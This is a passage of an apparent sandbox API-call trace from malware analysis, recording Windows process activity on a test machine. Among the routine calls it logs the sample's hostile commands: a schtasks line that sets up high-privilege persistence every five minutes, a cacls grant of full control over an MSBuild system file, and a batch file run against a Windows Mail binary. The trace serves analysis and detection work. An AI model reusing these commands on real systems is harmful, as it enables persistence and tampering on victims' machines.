dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1ef574 | out: lpCommandLine="schtasks /Create /tn DSHCA /tr \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\fMXj4weL.bat\" /sc minute /mo 5 /RL HIGHEST /F", lpProcessInformation=0x1ef574*(hProcess=0x78, hThread=0x74, dwProcessId=0xafc, dwThreadId=0xae4)) returned 1 [0169.653] CloseHandle (hObject=0x74) returned 1 [0169.653] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0169.653] GetProcessHeap () returned 0x610000 [0169.653] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x622ca8 | out: hHeap=0x610000) returned 1 [0169.653] GetEnvironmentStringsW () returned 0x622ca8* [0169.653] GetProcessHeap () returned 0x610000 [0169.654] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xb36) returned 0x6290d8 [0169.654] FreeEnvironmentStringsW (penv=0x622ca8) returned 1 [0169.654] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0199.453] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x1ef468 | out: lpExitCode=0x1ef468*=0x0) returned 1 [0199.453] CloseHandle (hObject=0x78) returned 1 [0199.453] _vsnwprintf (in: _Buffer=0x1ef5b0, _BufferCount=0x13, _Format="%08X", _ArgList=0x1ef474 | out: _Buffer="00000000") returned 8 [0199.453] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0199.453] GetProcessHeap () returned 0x610000 [0199.453] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6290d8 | out: hHeap=0x610000) returned 1 [0199.453] GetEnvironmentStringsW () returned 0x6290d8* [0199.453] GetProcessHeap () returned 0x610000 [0199.453] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xb5c) returned 0x626f58 [0199.453] FreeEnvironmentStringsW (penv=0x6290d8) returned 1 [0199.453] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0199.453] GetProcessHeap () returned 0x610000 [0199.453] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x626f58 | out: hHeap=0x610000) returned 1 [0199.454] GetEnvironmentStringsW () returned 0x6290d8* [0199.454] GetProcessHeap () returned 0x610000 [0199.454] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xb5c) returned 0x626f58 [0199.454] FreeEnvironmentStringsW (penv=0x6290d8) returned 1 [0199.454] GetProcessHeap () returned 0x610000 [0199.454] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x620110 | out: hHeap=0x610000) returned 1 [0199.454] DeleteProcThreadAttributeList (in: lpAttributeList=0x1ef4cc | out: lpAttributeList=0x1ef4cc) [0199.454] _get_osfhandle (_FileHandle=1) returned 0x7 [0199.454] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0199.455] _get_osfhandle (_FileHandle=1) returned 0x7 [0199.455] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0199.455] _get_osfhandle (_FileHandle=0) returned 0x3 [0199.455] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0199.455] SetConsoleInputExeNameW () returned 0x1 [0199.456] GetConsoleOutputCP () returned 0x1b5 [0199.456] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0199.456] SetThreadUILanguage (LangId=0x0) returned 0x409 [0199.456] exit (_Code=0) Process: id = "154" image_name = "cacls.exe" filename = "c:\\windows\\syswow64\\cacls.exe" page_root = "0x34a70000" os_pid = "0x4e0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "145" os_parent_pid = "0x6f4" cmd_line = "cacls \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\" /E /G 5p5NrGJn0jS HALPmcxz:F /C" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 659 os_tid = 0x74c Process: id = "155" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x33af1000" os_pid = "0x644" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "34" os_parent_pid = "0x184" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 660 os_tid = 0x3a4 Thread: id = 665 os_tid = 0x150 Thread: id = 669 os_tid = 0x284 Process: id = "156" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x33f2c000" os_pid = "0x710" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa7c" cmd_line = "cmd /c \"\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Mail\\wabmig.exe\"\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 666 os_tid = 0x85c [0170.714] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30f894 | out: lpSystemTimeAsFileTime=0x30f894*(dwLowDateTime=0x1f59e060, dwHighDateTime=0x1d68287)) [0170.714] GetCurrentProcessId () returned 0x710 [0170.714] GetCurrentThreadId () returned 0x85c [0170.714] GetTickCount () returned 0x1157743 [0170.714] QueryPerformanceCounter (in: lpPerformanceCount=0x30f88c | out: lpPerformanceCount=0x30f88c*=29105322689) returned 1 [0170.728] GetModuleHandleA (lpModuleName=0x0) returned 0x49da0000 [0171.283] __set_app_type (_Type=0x1) [0171.283] __p__fmode () returned 0x770331f4 [0171.283] __p__commode () returned 0x770331fc [0171.283] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49dc21a6) returned 0x0 [0171.283] __getmainargs (in: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c, _DoWildCard=0, _StartInfo=0x49dc4140 | out: _Argc=0x49dc4238, _Argv=0x49dc4240, _Env=0x49dc423c) returned 0 [0171.284] GetCurrentThreadId () returned 0x85c [0171.284] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x85c) returned 0x60 [0171.284] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0171.284] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0171.284] SetThreadUILanguage (LangId=0x0) returned 0x409 [0171.284] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0171.284] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x30f824 | out: phkResult=0x30f824*=0x0) returned 0x2 [0171.285] VirtualQuery (in: lpAddress=0x30f85b, lpBuffer=0x30f7f4, dwLength=0x1c | out: lpBuffer=0x30f7f4*(BaseAddress=0x30f000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0171.285] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x30f7f4, dwLength=0x1c | out: lpBuffer=0x30f7f4*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0171.285] VirtualQuery (in: lpAddress=0x211000, lpBuffer=0x30f7f4, dwLength=0x1c | out: lpBuffer=0x30f7f4*(BaseAddress=0x211000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0171.285] VirtualQuery (in: lpAddress=0x213000, lpBuffer=0x30f7f4, dwLength=0x1c | out: lpBuffer=0x30f7f4*(BaseAddress=0x213000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0171.285] VirtualQuery (in: lpAddress=0x310000, lpBuffer=0x30f7f4, dwLength=0x1c | out: lpBuffer=0x30f7f4*(BaseAddress=0x310000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x100000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0171.285] GetConsoleOutputCP () returned 0x1b5 [0171.285] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0171.285] SetConsoleCtrlHandler (HandlerRoutine=0x49dbe72a, Add=1) returned 1 [0171.285] _get_osfhandle (_FileHandle=1) returned 0x7 [0171.285] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0171.289] _get_osfhandle (_FileHandle=1) returned 0x7 [0171.289] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0171.289] _get_osfhandle (_FileHandle=1) returned 0x7 [0171.289] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0171.290] _get_osfhandle (_FileHandle=0) returned 0x3 [0171.290] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0171.290] _get_osfhandle (_FileHandle=0) returned 0x3 [0171.290] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0171.291] GetEnvironmentStringsW () returned 0x5a20d8* [0171.291] GetProcessHeap () returned 0x590000 [0171.291] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xaca) returned 0x5a2bb0 [0171.291] FreeEnvironmentStringsW (penv=0x5a20d8) returned 1 [0171.291] GetProcessHeap () returned 0x590000 [0171.291] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x4) returned 0x5a1878 [0171.291] GetEnvironmentStringsW () returned 0x5a20d8* [0171.292] GetProcessHeap () returned 0x590000 [0171.292] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xaca) returned 0x5a3688 [0171.292] FreeEnvironmentStringsW (penv=0x5a20d8) returned 1 [0171.292] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30e794 | out: phkResult=0x30e794*=0x68) returned 0x0 [0171.292] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30e79c, lpData=0x30e7a0, lpcbData=0x30e798*=0x1000 | out: lpType=0x30e79c*=0x0, lpData=0x30e7a0*=0x0, lpcbData=0x30e798*=0x1000) returned 0x2 [0171.292] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30e79c, lpData=0x30e7a0, lpcbData=0x30e798*=0x1000 | out: lpType=0x30e79c*=0x4, lpData=0x30e7a0*=0x1, lpcbData=0x30e798*=0x4) returned 0x0 [0171.292] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30e79c, lpData=0x30e7a0, lpcbData=0x30e798*=0x1000 | out: lpType=0x30e79c*=0x0, lpData=0x30e7a0*=0x1, lpcbData=0x30e798*=0x1000) returned 0x2 [0171.292] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30e79c, lpData=0x30e7a0, lpcbData=0x30e798*=0x1000 | out: lpType=0x30e79c*=0x4, lpData=0x30e7a0*=0x0, lpcbData=0x30e798*=0x4) returned 0x0 [0171.293] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30e79c, lpData=0x30e7a0, lpcbData=0x30e798*=0x1000 | out: lpType=0x30e79c*=0x4, lpData=0x30e7a0*=0x40, lpcbData=0x30e798*=0x4) returned 0x0 [0171.293] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30e79c, lpData=0x30e7a0, lpcbData=0x30e798*=0x1000 | out: lpType=0x30e79c*=0x4, lpData=0x30e7a0*=0x40, lpcbData=0x30e798*=0x4) returned 0x0 [0171.293] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30e79c, lpData=0x30e7a0, lpcbData=0x30e798*=0x1000 | out: lpType=0x30e79c*=0x0, lpData=0x30e7a0*=0x40, lpcbData=0x30e798*=0x1000) returned 0x2 [0171.293] RegCloseKey (hKey=0x68) returned 0x0 [0171.293] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30e794 | out: phkResult=0x30e794*=0x68) returned 0x0 [0171.293] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30e79c, lpData=0x30e7a0, lpcbData=0x30e798*=0x1000 | out: lpType=0x30e79c*=0x0, lpData=0x30e7a0*=0x40, lpcbData=0x30e798*=0x1000) returned 0x2 [0171.293] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30e79c, lpData=0x30e7a0, lpcbData=0x30e798*=0x1000 | out: lpType=0x30e79c*=0x4, lpData=0x30e7a0*=0x1, lpcbData=0x30e798*=0x4) returned 0x0 [0171.293] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30e79c, lpData=0x30e7a0, lpcbData=0x30e798*=0x1000 | out: lpType=0x30e79c*=0x0, lpData=0x30e7a0*=0x1, lpcbData=0x30e798*=0x1000) returned 0x2 [0171.293] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30e79c, lpData=0x30e7a0, lpcbData=0x30e798*=0x1000 | out: lpType=0x30e79c*=0x4, lpData=0x30e7a0*=0x0, lpcbData=0x30e798*=0x4) returned 0x0 [0171.293] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30e79c, lpData=0x30e7a0, lpcbData=0x30e798*=0x1000 | out: lpType=0x30e79c*=0x4, lpData=0x30e7a0*=0x9, lpcbData=0x30e798*=0x4) returned 0x0 [0171.293] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30e79c, lpData=0x30e7a0, lpcbData=0x30e798*=0x1000 | out: lpType=0x30e79c*=0x4, lpData=0x30e7a0*=0x9, lpcbData=0x30e798*=0x4) returned 0x0 [0171.293] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30e79c, lpData=0x30e7a0, lpcbData=0x30e798*=0x1000 | out: lpType=0x30e79c*=0x0, lpData=0x30e7a0*=0x9, lpcbData=0x30e798*=0x1000) returned 0x2 [0171.293] RegCloseKey (hKey=0x68) returned 0x0 [0171.294] time (in: timer=0x0 | out: timer=0x0) returned 0x5f51e2c7 [0171.294] srand (_Seed=0x5f51e2c7) [0171.294] GetCommandLineW () returned="cmd /c \"\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Mail\\wabmig.exe\"\"" [0171.294] GetCommandLineW () returned="cmd /c \"\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat\" \"C:\\Program Files\\Windows Mail\\wabmig.exe\"\"" [0171.294] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0171.295] GetProcessHeap () returned 0x590000 [0171.295] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x210) returned 0x5a20d8 [0171.295] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x5a20e0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0171.295] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0171.295] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0171.295] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0171.296] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0171.296] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0171.296] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0171.296] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0171.296] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0171.296] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0171.296] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0171.296] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0171.296] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0171.296] GetProcessHeap () returned 0x590000 [0171.296] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a2bb0 | out: hHeap=0x590000) returned 1 [0171.296] GetEnvironmentStringsW () returned 0x5a22f0* [0171.296] GetProcessHeap () returned 0x590000 [0171.296] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xae2) returned 0x5a4c50 [0171.297] FreeEnvironmentStringsW (penv=0x5a22f0) returned 1 [0171.297] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0171.297] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0171.297] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0171.297] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0171.297] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0171.297] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0171.297] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0171.297] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0171.297] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0171.297] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0171.297] GetProcessHeap () returned 0x590000 [0171.297] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x54) returned 0x5a17a8 [0171.297] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x30f560 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0171.297] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x30f560, lpFilePart=0x30f55c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x30f55c*="Desktop") returned 0x25 [0171.297] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0171.298] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x30f2dc | out: lpFindFileData=0x30f2dc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x5a5740 [0171.298] FindClose (in: hFindFile=0x5a5740 | out: hFindFile=0x5a5740) returned 1 [0171.298] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x30f2dc | out: lpFindFileData=0x30f2dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x5a5740 [0171.298] FindClose (in: hFindFile=0x5a5740 | out: hFindFile=0x5a5740) returned 1 [0171.298] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0171.298] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x30f2dc | out: lpFindFileData=0x30f2dc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x5a5740 [0171.298] FindClose (in: hFindFile=0x5a5740 | out: hFindFile=0x5a5740) returned 1 [0171.299] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0171.299] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0171.299] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0171.299] GetProcessHeap () returned 0x590000 [0171.299] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a4c50 | out: hHeap=0x590000) returned 1 [0171.299] GetEnvironmentStringsW () returned 0x5a4160* [0171.299] GetProcessHeap () returned 0x590000 [0171.299] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xb36) returned 0x5a5f80 [0171.299] FreeEnvironmentStringsW (penv=0x5a4160) returned 1 [0171.299] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0171.299] GetProcessHeap () returned 0x590000 [0171.299] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a17a8 | out: hHeap=0x590000) returned 1 [0171.299] GetProcessHeap () returned 0x590000 [0171.300] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x400e) returned 0x5a6ac0 [0171.300] GetProcessHeap () returned 0x590000 [0171.300] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xd0) returned 0x5a2e30 [0171.300] GetProcessHeap () returned 0x590000 [0171.300] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x4008) returned 0x5aaad8 [0171.301] GetProcessHeap () returned 0x590000 [0171.301] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x4008) returned 0x5aeae8 [0171.301] GetProcessHeap () returned 0x590000 [0171.313] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a6ac0 | out: hHeap=0x590000) returned 1 [0171.313] GetConsoleOutputCP () returned 0x1b5 [0171.314] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0171.314] GetUserDefaultLCID () returned 0x409 [0171.315] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49dc4950, cchData=8 | out: lpLCData=":") returned 2 [0171.315] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x30f6a0, cchData=128 | out: lpLCData="0") returned 2 [0171.315] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x30f6a0, cchData=128 | out: lpLCData="0") returned 2 [0171.315] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x30f6a0, cchData=128 | out: lpLCData="1") returned 2 [0171.315] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49dc4940, cchData=8 | out: lpLCData="/") returned 2 [0171.315] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49dc4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0171.315] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49dc4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0171.315] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49dc4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0171.316] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49dc4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0171.316] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49dc4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0171.316] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49dc4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0171.316] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49dc4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0171.316] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49dc4930, cchData=8 | out: lpLCData=".") returned 2 [0171.316] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49dc4920, cchData=8 | out: lpLCData=",") returned 2 [0171.316] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0171.318] GetProcessHeap () returned 0x590000 [0171.318] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x20c) returned 0x5a2f08 [0171.318] GetConsoleTitleW (in: lpConsoleTitle=0x5a2f08, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0171.318] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0171.318] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0171.319] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0171.319] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0171.320] GetProcessHeap () returned 0x590000 [0171.320] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x400a) returned 0x5a6ac0 [0171.320] GetProcessHeap () returned 0x590000 [0171.320] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a6ac0 | 